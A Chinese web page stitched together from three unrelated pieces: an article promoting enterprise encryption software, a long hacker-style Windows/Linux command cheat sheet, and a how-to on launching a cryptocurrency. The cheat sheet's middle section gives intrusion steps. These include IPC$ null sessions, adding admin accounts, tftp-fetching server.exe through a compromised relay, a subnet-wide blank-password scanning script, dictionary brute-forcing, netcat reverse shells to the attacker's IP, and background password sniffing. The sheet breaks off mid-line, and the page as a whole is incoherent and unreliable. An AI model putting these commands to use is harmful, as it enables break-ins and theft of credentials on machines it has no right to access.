加密生存計劃

㈠ 企業安裝加密軟體的重要性

根據調查數據顯示，2017年全球50%以上的企業至少遭遇過一場數據泄露事件。而因為合作夥伴或第三方的原因被泄露信息的企業超過1/3。今年明顯超過去年，數據安全已成為企業面臨的重大問題！很多企業已經安裝了數據防泄密系統，保護企業數據安全。

發生數據泄露的原因是多方面的。分為內部泄密和外部泄密，最大的泄露途徑則來源於企業內部。這是因為業務流程長、參與人員多和全面監管難。外部泄密中軟體本身存在的漏洞是一個原因，這很容易被黑客利用發起大規模的入侵。調查顯示，41%的外部攻擊是利用了已知的軟體漏洞。這方面典型的案例是WannaCry事件，這可能是2017年最嚴重的數據安全事件。

對待企業數據安全問題，如果從技術上考慮，採用數據防泄密系統或許是理想的解決方案。數據加密系統採用高強度加密演算法，如AES256,512，SM2、SM3等。並結合透明加密技術，可以實現數據安全的同時做到方便快捷。數據加密系統也被稱為防泄密軟體，數據防泄密系統在加密數據的同時，通過一些策略部署，可以做到文件在企業內部傳輸流通無礙，而一旦被外泄，則被高強度加密保護，不能被獲取真實有用的信息。

近幾年頻發的數據安全事件，提醒這各大企業要把保護企業數據安全提上日程，數據防泄密系統安裝也是越發的必要了

㈡ 給一些常用的運行命令吧

cmd （命令字元提示窗口）
net use ipipc$ " " /user:" " 建立IPC空鏈接
net use ipipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: ipc$ "密碼" /user:"用戶名" 直接登陸後映射對方C：到本地為H:
net use h: ipc$ 登陸後映射對方C：到本地為H:
net use ipipc$ /del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射
net user 用戶名 密碼 /add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup administrators 用戶名 /add 把「用戶」添加到管理員中使其具有管理員許可權,注意：administrator後加s用復數
net start 查看開啟了哪些服務
net start 服務名 開啟服務；(如:net start telnet， net start schele)
net stop 服務名 停止某服務
net time 目標ip 查看對方時間
net time 目標ip /set 設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net view ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C：共享
net user guest 12345 用guest用戶登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a 查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況，常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名 例：netstat -p tcq/ip 查看某協議使用情況（查看tcp/ip協議使用情況）
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個埠開了的話，就可查看對方最近登陸的用戶名（03前的為用戶名）-注意：參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由（數據包），參數：「-w數字」用於設置超時間隔。
ping ip(或域名) 向對方主機發送默認大小為32位元組的數據，參數：「-l[空格]數據包大小」；「-n發送數據次數」；「-t」指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用參數「/all」顯示全部配置信息
tlist -t 以樹行列表顯示進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
kill -F 進程名 加-F參數後強制結束某進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
del -F 文件名 加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如「DEL/AR *.*」表示刪除當前目錄下所有隻讀文件，「DEL/A-S *.*」表示刪除當前目錄下除系統文件以外的所有文件
二：
del /S /Q 目錄 或用：rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。（二個命令作用相同）
move 盤符路徑要移動的文件名 存放移動文件的路徑移動後文件名 移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中，"> "和"> >" 是重定向命令
at id號 開啟已注冊的某個計劃任務
at /delete 停止所有計劃任務，用參數/yes則不需要確認就直接停止
at id號 /delete 停止某個已注冊的計劃任務
at 查看所有的計劃任務
at ip time 程序名(或一個命令) /r 在某時間運行對方某程序並重新啟動計算機
finger username @host 查看最近有哪些用戶登陸
telnet ip 埠 遠和登陸伺服器,默認埠為23
open ip 連接到IP（屬telnet登陸後的命令）
telnet 在本機上直接鍵入telnet 將進入本機的telnet
路徑文件名1 路徑文件名2 /y 復制文件1到指定的目錄為文件2，用參數/y就同時取消確認你要改寫一份現存目錄文件
c:srv.exe ipadmin$ 復制本地c:srv.exe到對方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件，註：2st.txt文件頭要空三排，參數：/b指二進制文件，/a指ASCLL格式文件
ipadmin$svv.exe c: 或:ipadmin$*.* 復制對方admini$共享下的srv.exe文件（所有文件）至本地C：
x 要復制的文件或目錄樹 目標地址目錄名 復制文件和目錄樹，用參數/Y將不提示覆蓋相同文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:server.exe 登陸後，將「IP」的server.exe下載到目標主機c:server.exe 參數：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i 則以ASCII模式（傳送文本文件模式）進行傳送
tftp -i 對方IP put c:server.exe 登陸後，上傳本地c:server.exe至主機
ftp ip 埠 用於上傳文件至伺服器或進行文件操作，默認埠為21。bin指用二進制方式傳送（可執行文件進）；默認為ASCII格式傳送(文本文件時)
route print 顯示出IP路由，將主要顯示網路地址Network addres，子網掩碼Netmask，網關地址Gateway addres，介面地址Interface
arp 查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息
start 程序名或命令 /max 或/min 新開一個新窗口並最大化（最小化）運行某程序或命令
mem 查看cpu使用情況
attrib 文件名(目錄名) 查看某文件（目錄）的屬性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔，只讀，系統，隱藏 屬性；用＋則是添加為某屬性
dir 查看文件，參數：/Q顯示文件及目錄屬系統哪個用戶，/T:C顯示文件創建時間，/T:A顯示文件上次被訪問時間，/T:W上次被修改時間
date /t 、 time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間，而不必輸入新日期和時間
set 指定環境變數名稱=要指派給變數的字元 設置環境變數
set 顯示當前所有的環境變數
set p(或其它字元) 顯示出當前以字元p(或其它字元)開頭的所有環境變數
pause 暫停批處理程序，並顯示出：請按任意鍵繼續....
if 在批處理程序中執行條件處理（更多說明見if命令及變數）
goto 標簽 將cmd.exe導向到批處理程序中帶標簽的行（標簽必須單獨一行，且以冒號打頭，例如：「：start」標簽）
call 路徑批處理文件名 從批處理程序中調用另一個批處理程序 （更多說明見call /?）
for 對一組文件中的每一個文件執行某個特定命令（更多說明見for命令及變數）
echo on或off 打開或關閉echo，僅用echo不加參數則顯示當前echo設置
echo 信息 在屏幕上顯示出信息
echo 信息 >> pass.txt 將"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中尋找字元串hello
find 文件名 查找某文件
title 標題名字 更改CMD窗口標題名字
color 顏色值 設置cmd控制台前景和背景顏色；0＝黑、1＝藍、2＝綠、3＝淺綠、4＝紅、5＝紫、6＝黃、7=白、8=灰、9=淡藍、A＝淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:、D:統一改為：EntSky )
三：
ver 在DOS窗口下顯示版本信息
winver 彈出一個窗口顯示版本信息（內存大小、系統版本、補丁版本、計算機名）
format 盤符 /FS:類型 格式化磁碟,類型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
md 目錄名 創建目錄
replace 源文件 要替換文件的目錄 替換文件
ren 原文件名 新文件名 重命名文件名
tree 以樹形結構顯示出目錄，用參數-f 將列出第個文件夾中文件名稱
type 文件名 顯示文本文件的內容
more 文件名 逐屏顯示輸出文件
doskey 要鎖定的命令＝字元
doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令行，重新調用win2k命令，並創建宏)。如：鎖定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解鎖：doskey dir=
taskmgr 調出任務管理器
chkdsk /F D: 檢查磁碟D並顯示狀態報告；加參數/f並修復磁碟上的錯誤
tlntadmn telnt服務admn,鍵入tlntadmn選擇3，再選擇8,就可以更改telnet服務默認埠23為其它任何埠
exit 退出cmd.exe程序或目前，用參數/B則是退出當前批處理腳本而不是cmd.exe
path 路徑可執行文件的文件名 為可執行文件設置一個路徑。
cmd 啟動一個win2K命令解釋窗口。參數：/eff、/en 關閉、開啟命令擴展；更我詳細說明見cmd /?
regedit /s 注冊表文件名 導入注冊表；參數/S指安靜模式導入，無任何提示；
regedit /e 注冊表文件名 導出注冊表
cacls 文件名 參數 顯示或修改文件訪問控制列表（ACL）——針對NTFS格式時。參數：/D 用戶名:設定拒絕某用戶訪問；/P 用戶名:perm 替換指定用戶的訪問許可權；/G 用戶名:perm 賦予指定用戶訪問許可權；Perm 可以是: N 無，R 讀取， W 寫入， C 更改(寫入)，F 完全控制；例：cacls D: est.txt /D pub 設定d: est.txt拒絕pub用戶訪問。
cacls 文件名 查看文件的訪問用戶許可權列表
REM 文本內容 在批處理文件中添加註解
netsh 查看或更改本地網路配置情況

四：

IIS服務命令：
iisreset /reboot 重啟win2k計算機（但有提示系統將重啟信息出現）
iisreset /start或stop 啟動（停止）所有Internet服務
iisreset /restart 停止然後重新啟動所有Internet服務
iisreset /status 顯示所有Internet服務狀態
iisreset /enable或disable 在本地系統上啟用（禁用）Internet服務的重新啟動
iisreset /rebootonerror 當啟動、停止或重新啟動Internet服務時，若發生錯誤將重新開機
iisreset /noforce 若無法停止Internet服務，將不會強制終止Internet服務
iisreset /timeout Val在到達逾時間（秒）時，仍未停止Internet服務，若指定/rebootonerror參數，則電腦將會重新開機。預設值為重新啟動20秒，停止60秒，重新開機0秒。
FTP 命令： (後面有詳細說明內容)
ftp的命令行格式為:
ftp －v －d －i －n －g[主機名] －v 顯示遠程伺服器的所有響應信息。
－d 使用調試方式。
－n 限制ftp的自動登錄,即不使用.netrc文件。
－g 取消全局文件名。
help [命令] 或 ？[命令] 查看命令說明
bye 或 quit 終止主機FTP進程,並退出FTP管理方式.
pwd 列出當前遠端主機目錄
put 或 send 本地文件名 [上傳到主機上的文件名] 將本地一個文件傳送至遠端主機中
get 或 recv [遠程主機文件名] [下載到本地後的文件名] 從遠端主機中傳送至本地主機中
mget [remote-files] 從遠端主機接收一批文件至本地主機
mput local-files 將本地主機中一批文件傳送至遠端主機
dir 或 ls [remote-directory] [local-file] 列出當前遠端主機目錄中的文件.如果有本地文件,就將結果寫至本地文件
ascii 設定以ASCII方式傳送文件(預設值)
bin 或 image 設定以二進制方式傳送文件
bell 每完成一次文件傳送,報警提示
cp 返回上一級目錄
close 中斷與遠程伺服器的ftp會話(與open對應)
open host[port] 建立指定ftp伺服器連接,可指定連接埠
delete 刪除遠端主機中的文件
mdelete [remote-files] 刪除一批文件
mkdir directory-name 在遠端主機中建立目錄
rename [from] [to] 改變遠端主機中的文件名
rmdir directory-name 刪除遠端主機中的目錄
status 顯示當前FTP的狀態
system 顯示遠端主機系統類型
user user-name [password] [account] 重新以別的用戶名登錄遠端主機
open host [port] 重新建立一個新的連接
prompt 交互提示模式
macdef 定義宏命令
lcd 改變當前本地主機的工作目錄,如果預設,就轉到當前用戶的HOME目錄
chmod 改變遠端主機的文件許可權
case 當為ON時,用MGET命令拷貝的文件名到本地機器中,全部轉換為小寫字母
cd remote－dir 進入遠程主機目錄
cp 進入遠程主機目錄的父目錄
! 在本地機中執行交互shell，exit回到ftp環境,如!ls＊.zip

#5 五：

MYSQL 命令：
mysql -h主機地址 -u用戶名 －p密碼 連接MYSQL;如果剛安裝好MYSQL，超級用戶root是沒有密碼的。
（例：mysql -h110.110.110.110 -Uroot -P123456
注:u與root可以不用加空格，其它也一樣）
exit 退出MYSQL
mysqladmin -u用戶名 -p舊密碼 password 新密碼 修改密碼
grant select on 資料庫.* to 用戶名@登錄主機 identified by "密碼"; 增加新用戶。（注意：和上面不同，下面的因為是MYSQL環境中的命令，所以後面都帶一個分號作為命令結束符）
show databases; 顯示資料庫列表。剛開始時才兩個資料庫：mysql和test。mysql庫很重要它裡面有MYSQL的系統信息，我們改密碼和新增用戶，實際上就是用這個庫進行操作。
use mysql；
show tables; 顯示庫中的數據表
describe 表名; 顯示數據表的結構
create database 庫名; 建庫
use 庫名；
create table 表名 (欄位設定列表)； 建表
drop database 庫名;
drop table 表名； 刪庫和刪表
delete from 表名; 將表中記錄清空
select * from 表名; 顯示表中的記錄
mysqlmp --opt school>school.bbb 備份資料庫：（命令在DOS的mysql in目錄下執行）;注釋:將資料庫school備份到school.bbb文件，school.bbb是一個文本文件，文件名任取，打開看看你會有新發現。
win2003系統下新增命令（實用部份）：
shutdown /參數 關閉或重啟本地或遠程主機。
參數說明：/S 關閉主機，/R 重啟主機， /T 數字 設定延時的時間，范圍0～180秒之間， /A取消開機，/M //IP 指定的遠程主機。
例：shutdown /r /t 0 立即重啟本地主機（無延時）
taskill /參數 進程名或進程的pid 終止一個或多個任務和進程。
參數說明：/PID 要終止進程的pid,可用tasklist命令獲得各進程的pid，/IM 要終止的進程的進程名，/F 強制終止進程，/T 終止指定的進程及他所啟動的子進程。
tasklist 顯示當前運行在本地和遠程主機上的進程、服務、服務各進程的進程標識符(PID)。
參數說明：/M 列出當前進程載入的dll文件，/SVC 顯示出每個進程對應的服務，無參數時就只列出當前的進程。
六：
linux系統下基本命令： 要區分大小寫
uname 顯示版本信息（同win2K的 ver）
dir 顯示當前目錄文件,ls -al 顯示包括隱藏文件（同win2K的 dir）
pwd 查詢當前所在的目錄位置
cd cd ..回到上一層目錄，注意cd 與..之間有空格。cd /返回到根目錄。
cat 文件名 查看文件內容
cat >abc.txt 往abc.txt文件中寫上內容。
more 文件名 以一頁一頁的方式顯示一個文本文件。
cp 復制文件
mv 移動文件
rm 文件名 刪除文件，rm -a 目錄名刪除目錄及子目錄
mkdir 目錄名 建立目錄
rmdir 刪除子目錄，目錄內沒有文檔。
chmod 設定檔案或目錄的存取許可權
grep 在檔案中查找字元串
diff 檔案文件比較
find 檔案搜尋
date 現在的日期、時間
who 查詢目前和你使用同一台機器的人以及Login時間地點
w 查詢目前上機者的詳細資料
whoami 查看自己的帳號名稱
groups 查看某人的Group
passwd 更改密碼
history 查看自己下過的命令
ps 顯示進程狀態
kill 停止某進程
gcc 黑客通常用它來編譯C語言寫的文件
su 許可權轉換為指定使用者
telnet IP telnet連接對方主機（同win2K），當出現bash$時就說明連接成功。
ftp ftp連接上某伺服器（同win2K）

附：批處理命令與變數

1：for命令及變數 基本格式：
FOR /參數 %variable IN (set) DO command [command_parameters] %variable:指定一個單一字母可替換的參數，如：%i ，而指定一個變數則用：%%i ，而調用變數時用：%i% ，變數是區分大小寫的（%i 不等於 %I）。
批處理每次能處理的變數從%0—%9共10個，其中%0默認給批處理文件名使用，%1默認為使用此批處理時輸入的的第一個值，同理：%2—%9指輸入的第2-9個值；例：net use ipipc$ pass /user:user 中ip為%1,pass為%2 ,user為%3

(set):指定一個或一組文件，可使用通配符，如：(D:user.txt)和(1 1 254)(1 -1 254),{ 「(1 1 254)」第一個"1"指起始值，第二個"1"指增長量，第三個"254"指結束值，即：從1到254；「(1 -1 254)」說明：即從254到1 }

command：指定對第個文件執行的命令，如：net use命令；如要執行多個命令時，命令這間加：& 來隔開
command_parameters：為特定命令指定參數或命令行開關

IN (set)：指在(set)中取值；DO command ：指執行command

參數：/L 指用增量形式{ (set)為增量形式時 }；/F 指從文件中不斷取值，直到取完為止{ (set)為文件時，如(d:pass.txt)時 }。
用法舉例：
@echo off
echo 用法格式：test.bat *.*.* > test.txt

for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \%1.%%G /user:administrator | find "命令成功完成" >>test.txt
存為test.bat 說明：對指定的一個C類網段的254個IP依次試建立administrator密碼為空的IPC$連接，如果成功就把該IP存在test.txt中。

/L指用增量形式（即從1-254或254-1）；輸入的IP前面三位：*.*.*為批處理默認的 %1；%%G 為變數(ip的最後一位）；& 用來隔開echo 和net use 這二個命令；| 指建立了ipc$後，在結果中用find查看是否有"命令成功完成"信息；%1.%%G 為完整的IP地址；(1 1 254) 指起始值，增長量，結止值。
@echo off
echo 用法格式：ok.bat ip
FOR /F %%i IN (D:user.dic) DO smb.exe %1 %%i D:pass.dic 200
存為：ok.exe 說明：輸入一個IP後，用字典文件d:pass.dic來暴解d:user.dic中的用戶密碼，直到文件中值取完為止。%%i為用戶名；%1為輸入的IP地址（默認）。
七：
2：if命令及變數 基本格式：
IF [not] errorlevel 數字 命令語句 如果程序運行最後返回一個等於或大於指定數字的退出編碼，指定條件為「真」。
例：IF errorlevel 0 命令 指程序執行後返回的值為0時，就值行後面的命令；IF not errorlevel 1 命令指程序執行最後返回的值不等於1，就執行後面的命令。
0 指發現並成功執行（真）；1 指沒有發現、沒執行（假）。
IF [not] 字元串1==字元串2 命令語句 如果指定的文本字元串匹配（即：字元串1 等於 字元串2），就執行後面的命令。
例：「if "%2%"=="4" goto start」指：如果輸入的第二個變數為4時，執行後面的命令（注意：調用變數時就%變數名%並加" "）
IF [not] exist 文件名 命令語句 如果指定的文件名存在，就執行後面的命令。
例：「if not nc.exe goto end」指：如果沒有發現nc.exe文件就跳到":end"標簽處。
IF [not] errorlevel 數字 命令語句 else 命令語句或 IF [not] 字元串1==字元串2 命令語句 else 命令語句或 IF [not] exist 文件名 命令語句 else 命令語句 加上：else 命令語句後指：當前面的條件不成立時，就指行else後面的命令。注意：else 必須與 if 在同一行才有效。 當有del命令時需把del命令全部內容用< >括起來，因為del命令要單獨一行時才能執行，用上< >後就等於是單獨一行了；例如：「if exist test.txt. <del test.txt.> else echo test.txt.missing 」，注意命令中的「.」

（二）系統外部命令(均需下載相關工具)：

1、瑞士軍刀：nc.exe

參數說明：
-h 查看幫助信息
-d 後台模式
-e prog程序重定向，一但連接就執行〔危險〕
-i secs延時的間隔
-l 監聽模式，用於入站連接
-L 監聽模式，連接天閉後仍然繼續監聽，直到CTR+C
-n IP地址，不能用域名
-o film記錄16進制的傳輸
-p[空格]埠 本地埠號
-r 隨機本地及遠程埠
-t 使用Telnet交互方式
-u UDP模式
-v 詳細輸出，用-vv將更詳細
-w數字 timeout延時間隔
-z 將輸入，輸出關掉（用於掃錨時）
基本用法：
nc -nvv 192.168.0.1 80 連接到192.168.0.1主機的80埠
nc -l -p 80 開啟本機的TCP 80埠並監聽
nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024埠
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機的cmdshell在remote的TCP 5354埠
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的cmdshell並反向連接192.168.0.2的5354埠
高級用法：
nc -L -p 80 作為蜜罐用1：開啟並不停地監聽80埠，直到CTR+C為止
nc -L -p 80 > c:log.txt 作為蜜罐用2：開啟並不停地監聽80埠，直到CTR+C,同時把結果輸出到c:log.txt
nc -L -p 80 < c:honeyport.txt 作為蜜罐用3-1：開啟並不停地監聽80埠，直到CTR+C,並把c:honeyport.txt中內容送入管道中，亦可起到傳送文件作用
type.exe c:honeyport | nc -L -p 80 作為蜜罐用3-2：開啟並不停地監聽80埠，直到CTR+C,並把c:honeyport.txt中內容送入管道中,亦可起到傳送文件作用
本機上用：nc -l -p 本機埠
在對方主機上用：nc -e cmd.exe 本機IP -p 本機埠 *win2K
nc -e /bin/sh 本機IP -p 本機埠 *linux,unix 反向連接突破對方主機的防火牆
本機上用：nc -d -l -p 本機埠 < 要傳送的文件路徑及名稱
在對方主機上用：nc -vv 本機IP 本機埠 > 存放文件的路徑及名稱 傳送文件到對方主機
備 註：
| 管道命令
< 或 > 重定向命令。「<」，例如：tlntadmn < test.txt 指把test.txt的內容賦值給tlntadmn命令
＠ 表示執行＠後面的命令，但不會顯示出來（後台執行）；例：＠dir c:winnt >> d:log.txt 意思是：後台執行dir，並把結果存在d:log.txt中
>與>>的區別 ">"指：覆蓋；">>"指：保存到(添加到）。
如：@dir c:winnt >> d:log.txt和@dir c:winnt > d:log.txt二個命令分別執行二次比較看：用>>的則是把二次的結果都保存了，而用：>則只有一次的結果，是因為第二次的結果把第一次的覆蓋了。

八：

2、掃錨工具：xscan.exe

基本格式
xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項] 掃錨"起始IP到終止IP"段的所有主機信息
xscan -file <主機列表文件名> <檢測項目> [其他選項] 掃錨"主機IP列表文件名"中的所有主機信息
檢測項目
-active 檢測主機是否存活
-os 檢測遠程操作系統類型（通過NETBIOS和SNMP協議）
-port 檢測常用服務的埠狀態
-ftp 檢測FTP弱口令
-pub 檢測FTP服務匿名用戶寫許可權
-pop3 檢測POP3-Server弱口令
-smtp 檢測SMTP-Server漏洞
-sql 檢測SQL-Server弱口令
-smb 檢測NT-Server弱口令
-iis 檢測IIS編碼/解碼漏洞
-cgi 檢測CGI漏洞
-nasl 載入Nessus攻擊腳本
-all 檢測以上所有項目
其它選項
-i 適配器編號 設置網路適配器, <適配器編號>可通過"-l"參數獲取
-l 顯示所有網路適配器
-v 顯示詳細掃描進度
-p 跳過沒有響應的主機
-o 跳過沒有檢測到開放埠的主機
-t 並發線程數量,並發主機數量 指定最大並發線程數量和並發主機數量, 默認數量為100,10
-log 文件名 指定掃描報告文件名 (後綴為：TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 檢測192.168.1.1-192.168.255.255網段內主機的所有漏洞，跳過無響應的主機
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測192.168.1.1-192.168.255.255網段內主機的標准埠狀態，NT弱口令用戶，最大並發線程數量為150，跳過沒有檢測到開放埠的主機
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 檢測「hostlist.txt」文件中列出的所有主機的標准埠狀態，CGI漏洞，最大並發線程數量為200，同一時刻最多檢測5台主機，顯示詳細檢測進度，跳過沒有檢測到開放埠的主機

九：

3、命令行方式嗅探器: xsniff.exe
可捕獲區域網內FTP/SMTP/POP3/HTTP協議密碼
參數說明
-tcp 輸出TCP數據報
-udp 輸出UDP數據報
-icmp 輸出ICMP數據報
-pass 過濾密碼信息
-hide 後台運行
-host 解析主機名
-addr IP地址 過濾IP地址
-port 埠 過濾埠
-log 文件名 將輸出保存到文件
-asc 以ASCII形式輸出
-hex 以16進制形式輸出
用法示例
xsniff.exe -pass -hide -log pass.log 後台運行嗅探密碼並將密碼信息保存在pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1並過濾tcp和udp信息並以ASCII格式輸出

4、終端服務密碼破解: tscrack.exe

參數說明
-h 顯示使用幫助
-v 顯示版本信息
-s 在屏幕上打出解密能力
-b 密碼錯誤時發出的聲音
-t 同是發出多個連接（多線程）
-N Prevent System Log entries on targeted server
-U 卸載移除tscrack組件
-f 使

㈢ 如何快速創建自己的加密貨幣

5步教你創建屬於自己的加密貨幣
當你看到製作出實物鈔票要多麼復雜時，就很容易明白為什麼大多數人不會每天都開始嘗試印製新形式的貨幣，但對於只有基礎編程水平的人來說，製造出新的數字貨幣也會非常容易。
編程並不是製造新的數字貨幣的唯一步驟。下面是三個加密貨幣製造商給出您應遵循的五個步驟。
1、使用社區培育貨幣
克里斯·埃利斯是一位來自倫敦的企業家，同時也是羽毛幣社區活動家，他認為，當你考慮製造一個新的數字貨幣時，很容易假設第一步就應該開始貨幣編程，其實這是錯誤的。
「第一步是找到一個社區，並在社區周圍建立一種貨幣，而不是在建立一種貨幣後指望著人們都能出現，」埃利斯說，「它必須符合社區的需求，並與他們的文化遺產和背景相關。」
羽毛幣由彼得·布希內爾在2013年4月創建。布希內爾在牛津大學布雷奇諾斯學院辭去了他的IT主管職位，因為他想自己創造一個以人為中心的貨幣。他在一個知名加密貨幣網站bitcointalk.org上看到，現有加密貨幣（比如比特幣）缺乏社區參與和包容性，隨即做出上述決定。
自去年3月以來，埃利斯一直積極宣傳和向人們教授加密貨幣的知識，雖然當時還沒有遇到布希內爾，但也感同身受的意識到比特幣論壇上的那種疏遠化和隔離感。
「這些論壇非常注重技術，對新人或少數群體並不歡迎，通常較小的團隊能更好地服務這些新人或少數群體，」埃利斯說。「論壇並沒有讓人們更便捷地參與貨幣開發。這些論壇上的很多人都來預測價格而不是主動參與開發。」
埃利斯找到了基於羽毛幣的加密貨幣社區，他表示，技術發展從社區中獲益頗多。
「我們是一群羽毛幣的加密愛好者，但是其中的一些新手要是在其他社區，可能不會這么輕易地融入進去」， 埃利斯說。他表示，羽毛幣的每個人都認為，重要的是要展示出一群忠實的人能夠建立穩定的貨幣。通過合作，一個專門的加密愛好者社區能夠更好地發現並解決漏洞和安全威脅，例如羽毛幣編碼社區成功抵禦了51％的攻擊。
建立這種保護措施並促進貨幣的發展，可以使貨幣在公眾眼中更合法，更容易被信任。可如果參與其中的都是一群只為私利的被動觀察者，這就麻煩了。
2、編程，為了長期的利益
令人驚訝的是，與我交談的每一位貨幣開發人員都說過同樣的事情：「對加密貨幣編程通常是流程中耗時最少的部分。這是因為現在市場上的所有加密貨幣都基於GitHub上提供的比特幣或萊特幣的開源代碼。」
Coino的創始人之一皮特·奧特巴赫表示：「創作本身並不需要很長時間。 這可能只有一天」，該公司自稱是市場上最快的加密貨幣，最大交易時間僅為50秒。「要想開始編程，只需要會C ++就可以在其中創建自己的功能。」
據誇克加密貨幣開發商科林·埃文斯稱，時間可能比一天長一點。「在編程方面，最復雜的步驟可能與您計劃擁有區塊鏈的各個參數的復雜程度有關，」 埃文斯說。「例如，很多貨幣只是使用並復制萊特幣代碼，但是誇克有一個全新的Hash演算法 - 也就是說，它與比特幣和萊特幣都是分開的 - 所以如果想要改變，這方面肯定會是最困難的。」在這種情況下對加密貨幣編程可能需要幾個月的時間。 但是，埃文斯指出，如果開發人員只是重復使用GitHub的代碼並只更改一些簡單的參數，那麼任何一個有能力的編程人員都可以在「30分鍾內完成」。
但僅僅認為任何掌握C ++技能的人，都可以製作自己的加密貨幣，並不意味著有一天貨幣種類會像iOS應用那樣多，「羽毛幣事實上是萊特幣的一個分支，」埃利斯說。「它始於最小數量的參數變化，因為我們認為貨幣最重要的特徵是生存能力。」
然而，羽毛幣團隊注意到，之前出現的一些貨幣並沒有持續很長時間，因為它們包含了一個新功能，該功能可使投資者通過短期投機炒作盈利，但隨後團隊常無法長期按計劃管理項目，致使項目失敗。換句話說，那些失敗的貨幣開發者可能想要短期創建加密貨幣並從中贏利，而不是進行長期開發——這從一開始就註定了會失敗。
埃利斯表示：「必須要對修復缺陷負責，並且在推出貨幣時做出承諾，也有責任告知人們風險並保護他們的財產，」 如果你不能這樣做，那麼沒有人會一直使用你的貨幣。
3、讓礦工登場
一旦你開發了貨幣，就需要把信息傳播出去，以便人們開始挖掘這種貨幣，讓人們意識到它的存在，並有望開始在礦工和用戶眼中得到一些價值。這就是加密貨幣製造商不能像程序員一樣思考的地方，而是要研究人類如何將信任（和價值）置於事物之中。
羽毛幣的埃利斯解釋說：「一個好的開始就是成功了一半，因此這涉及建立信任，向礦工們表達您的願景和意圖，他們擁有所需的硬體，並讓他們有機會迎接未來的機遇。「你必須誠實並尊重人們的期望和對風險的寬容，這是很多人看重的。
「貨幣銷售量過熱會適得其反， 包括那些只是為了嘗試或為了脫穎而出而設計的新功能也不起作用。市場可以測試勇氣和決心。你需要一群忠於初心，忠誠的礦工，即使在價格暴跌時也會處理交易，因為他們相信最終的結果。 這取決於良好的溝通和團隊建設。
「許多加密貨幣因為低估了『軟體』而失敗了，他們認為用技術可以解決所有問題。 然後事情並不是像他們所想像的那樣。你必須善於意識到需要完成哪些工作，並准備好做別人不想做的工作。」
4、了解你的商家
如果你已經做到了這一點。 你已經將一個優秀的加密貨幣概念化，並將正確的團隊聚在一起，沿著自己的方式進行培養和培育。你已經在加密貨幣論壇上傳播了這個消息，並且有一大批礦工正積極努力挖掘你的貨幣。下一步就是營銷你的貨幣，以便所有挖礦人都可以使用它。這是不小的壯舉。畢竟，你需要說服個人和商家自己創造的這些貨幣擁有價值，並且可以像傳統可被信任的貨幣一樣進行交易。
「這是一個建立信心的過程，」埃利斯說。「需要很好的管理，花時間來制定出你真正相信和主張的東西。相比你的行動，人們會更願意基於你的動機來購買貨幣，所以一旦你有信心，就必須開始向朋友，商人，在互聯網論壇和社交媒體上討論你的貨幣。」
皮特·奧特巴赫認同此種觀點，「開始營銷需要找到確切的目標群體，」他說， 「起初你可以從加密貨幣市場開始，因為那裡的人知道這種貨幣，你會看到他們的第一反應。之後會變得更加困難。你需要說服許多甚至不知道加密貨幣是什麼的人，所以你必須把貨幣作為在線商店的支付解決方案，來吸引他們關注。」
「我想補充說，不僅僅是用事實來教育他們，」埃利斯說，「這是為了鼓勵他們學習和發現自己的優勢。 金錢是一個分類賬戶，它是人們用來達到目標和滿足其需求的一種工具。 了解這一點將會使你在營銷工作中取得長足的進步。」
